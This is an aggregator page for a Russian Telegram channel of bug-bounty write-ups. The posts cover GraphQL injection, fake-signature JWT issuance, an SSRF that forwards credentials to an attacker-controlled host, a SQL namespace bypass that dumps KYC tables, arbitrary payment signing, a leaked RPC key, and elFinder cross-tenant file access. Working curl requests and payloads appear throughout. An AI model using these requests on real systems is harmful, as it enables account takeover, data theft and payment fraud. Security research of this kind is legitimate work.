Пингискок

Public

Просмотреть канал

394

74.4K

385.1K

Не можете присоединиться? @rmrf_0

578 Участники

Обновлено: May 6, 2026 at 10:23 PM

Пингискок

Здесь про баги, уязвимости и security-ресерч. Web2, Web3, Bug Bounty https://rmrf.tips

Join @rmrf_0 for exclusive web2 and httpsrmrftips content and discussions in 12

Рейтинг

Глобальный рейтинг

#456

Рейтинг по языку

#45

Рейтинг по категории

#23

-1

Рост участников (Последние 3 дней)

Всего: 578

Рост за 24ч: +0 0%

Последние посты

Пингискок

27 апр. 2026 г., 01:09

GraphQL Injection через строковую интерполяцию

Проект - bridge для перевода токенов между L1 и L2. Фронтенд обращается к The Graph для чтения данных о трансферах. Исходный код нашли через source maps, оставленные в production (2159 файлов).

Что в коде

Файл queries.ts содержал функции с прямой подстановкой пользовательского ввода в тело GraphQL-запроса через template literals:

const query = `
{
transferSents(
where: {
recipient: "${recipient}",
transactionHash: "${txHash}",
}
) { id transferId amount ... }
}
`

Точно как SQL Injection, только для GraphQL.

Как работает

Нормальный подход - переменные передаются отдельно от запроса, и парсер никогда не интерпретирует их как синтаксис. А тут строка склеивается с данными напрямую.

Если атакующий подставит вместо адреса:
"} ) { id } transferSents(where: { amount_gt: "0

Он закрывает оригинальный блок where и вставляет свой запрос с другими условиями.

Что можно извлечь

Subgraph содержит данные обо всех трансферах всех пользователей: адреса, суммы, цепочки, хеши, статусы, fee, bonder. Без инъекции видишь только свои трансферы. С инъекцией - чужие.

Почему .toLowerCase() не спасает

Это нормализация адресов, не экранирование. Символы ", }, {, (, ) не затрагиваются.

Три уязвимых функции

fetchTransferSents - recipient, txHash
fetchTransferFromL1Completeds - recipient, amount, deadline
fetchWithdrawalBondedsByTransferId - transferId

Запросы уходят из браузера напрямую (нет backend-прокси). Атакующий перехватывает запрос через DevTools/proxy и подменяет параметры. Или подставляет вредоносные значения через URL-параметры.

Да, веб3 - это будущее, кричали несколько лет назад. Но тут еще веб 2 не защищен, а вы уже доверяете ему бабками управлять. Веб3 дырявая шляпа и самые интересные баги этого канала скорее всего будут оттуда.

414

Пингискок

27 апр. 2026 г., 01:09

📷 Photo

CERTIK это конечно очень важно и нужно. А что с вебом делать то будем?

Как ДОЛЖНА работать Web3 аутентификация

Нормальный flow аутентификации через кошелёк:

1. Клиент серверу: "Хочу войти, мой адрес 0xАБВ"
2. Сервер клиенту: "Подпиши этот уникальный nonce: a7f3b2..."
3. Клиент подписывает nonce приватным ключом в MetaMask
4. Клиент серверу: "Вот подпись: 0x8e3f..."
5. Сервер проверяет подпись через ecrecover - совпадает ли она с адресом 0xАБВ
6. Только после проверки - выдаёт JWT

Смысл в том, что приватный ключ есть только у владельца кошелька. Без подписи доказать владение адресом невозможно.

Как это работает у исследуемого проекта

1. Клиент серверу: "Мой адрес 0xАБВ"
2. Сервер: "Ок, держи JWT" - всё, конец

Шаги 2-5 просто отсутствуют. Сервер верит на слово.

Более того, endpoint /api/auth/verify который по названию должен проверять подпись - принимает параметры signature и nonce, но полностью их игнорирует:

# Фейковая подпись "FAKE" - принимается
curl -sk -X POST 'https://example.com/api/auth/verify' \
-H 'Content-Type: application/json' \
-d '{"wallet_address":"0x.....","signature":"FAKE","nonce":"FAKE"}'

# Ответ: 200 OK + валидный JWT

Почему это критично

Ethereum адрес - публичная информация. Любой адрес можно посмотреть на http://etherscan.io/. Это как логин без пароля. Зная адрес кошелька пользователя, атакующий:

1. Отправляет один POST запрос с этим адресом
2. Получает JWT токен
3. С этим токеном читает /api/user - а там в ответе прилетают password_hash, two_fa_code, reset_token
4. Полный захват аккаунта

Почему это работает (вероятная причина)

Скорее всего, разработчики:
- Написали auth endpoints как заглушки с планом "потом добавим проверку подписи"
- Использовали catch-all route (/api/auth/[...slug]) в Next.js, который на любой POST с wallet_address создаёт/находит пользователя и выдаёт JWT
- Функция ecrecover или verifyMessage либо не вызывается, либо её результат не проверяется перед выдачей токена
- Все 8 auth endpoints проходят через один и тот же handler, который сразу делает jwt.sign({userId: user.id}) без проверки

В клиентском JS видно, что фронтенд всё делает правильно - вызывает MetaMask, получает подпись, отправляет её. Но бэкенд эту подпись не проверяет.

С учетом того что у проекта есть свой токен - становится не сложным поиск адресов всех холдеров/пользователей этого проекта.

Пингискок

27 апр. 2026 г., 01:09

SSRF бесполезная бага. Казалось бы...

SSRF - утечка credentials через proxy-эндпоинт

Уязвимый endpoint такой:

POST https://explorer.example.com/api/proxy

Что происходит?

Blockchain explorer на Next.js проксирует запросы к внешнему API аналитики. На бэкенде формируется URL вида:
https://node-lite.webapi.analytics.io{path}

Параметр path берётся напрямую из JSON body без валидации. Символ @ в URL позволяет провернуть классический URL parsing confusion (userinfo@newhost):

https://[email protected]/capture

URL-парсер считает всё до @ логином, а ATTACKER.com реальным хостом.

Что утекло

Сервер при каждом проксируемом запросе автоматически прикрепляет заголовок:
Authorization: Basic 

PoC

curl -sk -X POST "https://explorer.example.com/api/proxy" \
-H "Content-Type: application/json" \
-d '{"path":"@/ssrf-capture","data":{}}'

409

Пингискок

27 апр. 2026 г., 01:09

862K записей из "защищённой" блокчейн-платформы одним curl

Web3-платформа децентрализованной идентификации. KYC-данные (паспорта, документы, верификация личности), кошельки, credentials. Кастомный движок на Go с SQL-подобным языком запросов, API через JSON-RPC. "Блокчейн, тут всё подписано" - поэтому багу никто не нашёл, или нашёл и долго "сидел" на ней.

Вызов rpc.discover (стандарт OpenRPC - аналог Swagger для JSON-RPC) отдаёт полную схему API: 33 метода с параметрами и типами. Среди них user.query (произвольный SQL) и user.authenticated_query (SQL с аутентификацией). Всегда стоит проверять discovery-эндпоинты - rpc.discover, Swagger, GraphQL introspection - разработчики часто забывают закрыть их на проде, а это по сути полная карта всего API.

Первая стена

user.query на проде возвращает: "adhoc query not allowed". Прямой путь закрыт - но есть второй метод.

Auth bypass

user.authenticated_query принимает:
- Challenge - одноразовый токен (получаем бесплатно через user.challenge, без каких-либо проверок)
- auth_type - тип криптографической подписи
- Statement - сам SQL-запрос к базе
- sender - публичный ключ отправителя
- signature - подпись запроса приватным ключом

Выглядит серьёзно: challenge-response протокол, подпись secp256k1 - стандарт, который используют Bitcoin и Ethereum.

Но из опыта, в Web3-проектах часто поддерживают несколько auth_type (eip712, secp256k1, ed25519, NEAR), а реально валидируют подпись только для одного-двух. Остальные - заглушки или недописанная логика. Пробую отправить заведомо невалидные данные:

auth_type: "secp256k1"
sender: любой pubkey (33 байта hex, префикс 02 или 03)
signature: "deadbeef" - четыре произвольных байта вместо настоящей подписи

Ответ: "user does not have privilege SELECT on namespace main"

Это не "invalid signature". Сервер не сказал "подпись неверна" - он сказал "у тебя нет прав". Разница принципиальна: это ошибка авторизации (AuthZ - проверка прав), а не аутентификации (AuthN - проверка личности). Значит, подпись deadbeef принята как валидная и этап проверки личности пройден.

Дальше - больше: пустая подпись и даже пустой auth_type тоже проходят. Verify() просто не вызывается - поле signature десериализуется и игнорируется. Аутентификация не функциональна ни для одного auth_type. Вероятная причина: метод задуман для внутренних вызовов между нодами, где подпись проверяется на уровне gateway, но оказался доступен снаружи напрямую.

Поэтому если видишь "нет прав" вместо "неверная подпись" - AuthN скорее всего пройдена и осталось обойти AuthZ.

Namespace bypass

Итак, мы аутентифицированы, но нет прав на namespace main. Здесь нужно понимать специфику движка: Kwil DB использует язык Kuneiform, в котором есть концепция пространств имён (namespaces) - изолированные контексты с собственными правами доступа. Запрос можно выполнить в контексте конкретного namespace, указав его перед SQL:

{idos} SELECT count(*) FROM main.users -- 151218

Сработало. Root cause - классическая ошибка TOCTOU (Time of Check / Time of Use), момент проверки прав и момент обращения к данным разнесены по логике:

1. Сервер проверяет: есть ли у namespace {idos} право на SELECT? - да
2. Сервер выполняет запрос и резолвит таблицу по полному имени main.users - из другого namespace
3. Повторной проверки прав на main уже не происходит

Привилегия проверяется по контексту запроса, а таблица берётся по явному указанию - и между этими двумя этапами нет сквозной проверки.

Перебрал {main}, {idos}, {default}, {test}, {admin}, {public}, {kwild} - из семи вариантов сработал один. {idos} - это namespace самого приложения, развёрнутого на блокчейне, и у него оказались права на чтение, которых не было у нас напрямую.


Результат

main.users -- 151218
main.wallets -- 198329
main.credentials -- 253450
main.access_grants -- 129455
main.shared_credentials -- 130313

Цепочка из двух багов: auth bypass (подпись не валидируется ни для одного auth_type) + namespace bypass (TOCTOU в проверке привилегий) = полное чтение продакшен-базы одним запросом.

Пингискок

27 апр. 2026 г., 01:09

А можно было отдать просто auth bypass и этим ограничиться...

374

Пингискок

27 апр. 2026 г., 01:09

P. S. Утилиты и ход мыслей

Чем работал

katana - краулинг с --js-crawl. Собрал все 10 JS-чанков и показал структуру бандлов.

grep/jq - парсинг минифицированного JS. Искал https://, fetch(, baseURL, endpoint, apiKey.
## Почему сразу в JS

SPA отдаёт 200 на любой путь - фаззинг директорий бесполезен. Серверных эндпоинтов не видно. Классическая разведка (краулинг, брутфорс путей) ничего не даёт.

Но Web3-проект не может спрятать логику на клиенте - это архитектурное ограничение. Значит единственный путь — читать бандлы. Source maps попробовал первым делом - .js.map отдавали HTML (SPA catch-all). Пришлось вручную.

Почему сразу к /wert

Из 17 эндпоинтов большинство - информационные GET. Интересны те, которые что-то делают: принимают POST и меняют состояние.

/wert сразу выделился, потому что принимает параметры платежа - возвращает криптографическую подпись - подпись идёт в платёжный шлюз. Первый вопрос: "а что он подпишет, если подменить адрес контракта?". Подписал всё без единой проверки.

Что не сработало
- Фаззинг путей - SPA отдаёт 200 на всё, бессмысленно
- SQLi - MongoDB на бэкенде, нет точек ввода в SQL
- XSS - формы отключены, комментарии закрыты, поиск HTML-энкодит
- Source maps - все .js.map отдают SPA catch-all

Получается что подтверждение того, что стандартные вектора закрыты, сужает фокус на логические баги - где и нашлась главная находка.

518

Пингискок

27 апр. 2026 г., 01:09

Как 5.6 МБ JavaScript раскрыли скрытый бэкенд и подпись произвольных платежей
Аудит Web3-проекта с крипто-пресейлом. Фронтенд - React SPA за Cloudflare. Ни одного видимого API-эндпоинта. Казалось бы - нечего ломать.

React SPA отдаёт один index.html на любой путь. WordPress-поддомены закрыты Cloudflare. REST API отключён. Регистрация отключена. Живых эндпоинтов - ноль.

Но у Web3-проектов есть особенность: вся логика взаимодействия с блокчейном живёт на клиенте. Кошелёк подключается из браузера, адреса контрактов и RPC-вызовы формируются на фронте. Сервер не может это спрятать. Когда видишь пустую SPA-оболочку без единого API - это не тупик. Это приглашение читать бандлы.

Vite нарезал код на 10 чанков. Source maps недоступны (все .js.map возвращают HTML фронтенда - SPA catch-all). Только ручной разбор минифицированного кода.

app-[hash].js 434 KB - бизнес-логика, роуты, платежи
main-[hash].js 576 KB - WalletConnect, UI
wallet-libs-[hash] 3.5 MB - кошельки, провайдеры, цепочки
crypto-libs-[hash] 637 KB - криптобиблиотеки

Ищу строки: https://, baseURL, fetch(, axios, endpoint. В чанке бизнес-логики нахожу базовый URL, который нигде не фигурировал - ни в DNS, ни в документации, ни в HTML. Бэкенд жил на полностью отдельном домене.

Один GET на /health подтвердил:

{"status":"ok","info":{"mongodb":{"status":"up"},"google":{"status":"up"}}}

CORS настроен правильно (только домен фронтенда), но GET-эндпоинты не требуют аутентификации - прямые curl-запросы работают.

Дальше - по всему JS-бандлу собираю пути, параметры, заголовки. Восстановил 17 эндпоинтов. Каждый проверил вручную - какие требуют авторизацию, какие нет, какие принимают пользовательский ввод и как его валидируют.
Большинство GET-эндпоинтов оказались открыты: финансовая конфигурация пресейла, баланс любого кошелька по адресу (IDOR), статистика стейкинг-пулов, валидация промокодов (перебор). Неприятно, но не критично.

Самый интересный - POST /wert.
Wert - фиатный шлюз. Пользователь платит картой, Wert выполняет on-chain транзакцию. Бэкенд подписывает параметры платежа, и эта подпись говорит Wert: «транзакция легитимна».

Эндпоинт /wert принимает POST с параметрами и возвращает подписанные данные. Проверяю - что если подменить адрес смарт-контракта?

# Отправляю произвольный:
curl -X POST https:///wert \
-H "Content-Type: application/json" \
-d '{"sc_address":"0x0000000000000000000000000000000000000001",
"sc_input_data":"0xdeadbeef",
"commodity_amount":100}'

Ответ: валидная подпись.

Подменяю sc_address на произвольный контракт - подписано. Подменяю sc_input_data на произвольные calldata - подписано. Ставлю commodity_amount = -1 - подписано. Ставлю 0 - тоже подписано.

Сервер подписывает всё. Нет валидации адреса, нет проверки calldata, нет ограничений на сумму. Если Wert доверяет подписи без собственной валидации - атакующий подменяет sc_address на свой контракт, получает подпись, инициирует платёж, и средства пользователя уходят не туда.

Бонус: RPC-ключ с debug-доступом к 5 блокчейнам

В том же бандле - API-ключ RPC-провайдера. Рабочий на 5 сетях (BSC, Ethereum, ETH Sepolia, Solana Mainnet, Solana Devnet) с premium-методами:

# debug_traceBlockByNumber - трассировка ВСЕХ транзакций блока
# (опкоды, стек, память, internal calls)
curl -X POST "https:///$KEY" \
-d '{"method":"debug_traceBlockByNumber","params":["latest",{}]}'
# Получаю 200 OK

# txpool_status - мемпул
# {"pending":"0x2d","queued":"0x2ee"}

Debug + archive - premium-тариф. Вектор для MEV/фронтраннинга + нагрузка на платный план проекта.

Пингискок

27 апр. 2026 г., 01:09

Получил файлы 133 компаний через квиз-платформу

Типичный web3.
После рекона вижу quiz.* с другим стеком и UI (сторонняя SaaS-платформа для квизов. httpx помогает сразу видеть что к чему).
Регнулся даже без подтверждения почты - попал сразу в полный дашборд. В разделе контента нашёл встроенный файловый менеджер. В DevTools (перестал к херам пользоваться дегенератским бурпом, но и к caido привыкнуть не могу) вижу:
GET /elfinder/connector?cmd=open&target=...
elFinder. При виде elFinder должен подняться пульс - у него CVE-шки сыплются каждый год (path traversal, RCE, file delete).
elFinder с параметром target:
target=flsproject_clientname1_s3_cHJvamVjdHMvcHJvZC9jbGllbnRuYW1l
Первое что бросается в глаза - конец строки. cHJvamVjdHMv... - выглядит как base64. Когда видишь непрозрачный идентификатор - всегда пробуй base64. В 80% случаев "хеши" в вебе это просто base64.
Декодирую хвост:
echo 'cHJvamVjdHMvcHJvZC9jbGllbnRuYW1l' | base64 -d
→ projects/prod/clientname
Окей, это путь в файловой системе. Причём структурированный: projects/prod/clientname. Дальше мозг автоматом задаёт вопрос — если мой тенант лежит в projects/prod/clientname, то что лежит в projects/prod/? Это же просто родительская директория. Там должны быть папки всех тенантов.
Кодирую projects/prod обратно в base64, подставляю volume ID из оригинального запроса:
echo -n 'projects/prod' | base64
cHJvamVjdHMvcHJvZA==
Подставляю в запрос вместо оригинального хеша. Ответ - 133 директории. Каждая - отдельная компания-клиент платформы.
Подтвердил: чтение файлов чужих тенантов, создание директории (сразу удалил), загрузку HTML который отдаётся CDN с text/html без CSP - stored XSS на легитимном домене в подарок.

Забавно что напрямую бакет закрыт и листинг директорий отдаёт AccessDenied. Проблема не в публичном бакете. elFinder работает как прокси - у него на сервере лежат креды к бакету, и когда ты дёргаешь /elfinder/connector?cmd=ls&target=..., он со своими кредами лезет в бакет и отдаёт тебе результат. Бакет настроен нормально, а вот elFinder имеет доступ ко ВСЕМУ бакету без ограничения по префиксу тенанта.

Пингискок

27 апр. 2026 г., 01:09

Channel created

Пингискок

27 апр. 2026 г., 01:09

В этом канале за основу возьму написание мини райтапов по интересным, на мой взгляд багам, котторые я находил на проектах или bugbounty.
Може кто-то почерпнет для себя что-то новое, а может и вспомнит какую-то технику.
А параллельно буду постить что душа пожелает.

252

Showing 10 of 10 posts

No more posts

Рейтинг

Требуется вход

Отзывы пользователей (0)

Пока нет отзывов. Будьте первым, кто поделится своим опытом!

Пингискок

Пингискок

Рейтинг

Рост участников (Последние 3 дней)

Последние посты

Рейтинг

Отзывы пользователей (0)

Похожие каналы Telegram

JetTon Proxy 🔓

КЛЕВЕР COEX

КручуВерчу 🤟 SEODEN

Meta-AI | Мета-ИИ

XONE - Приватные читы для CS2

Габи Сатори

Схематоза 3.0

Навигаторская Григория

Похожие каналы Telegram

JetTon Proxy 🔓

КЛЕВЕР COEX

КручуВерчу 🤟 SEODEN

Meta-AI | Мета-ИИ

XONE - Приватные читы для CS2

Габи Сатори

Схематоза 3.0

Навигаторская Григория

Отзывы пользователей (0)

Последние посты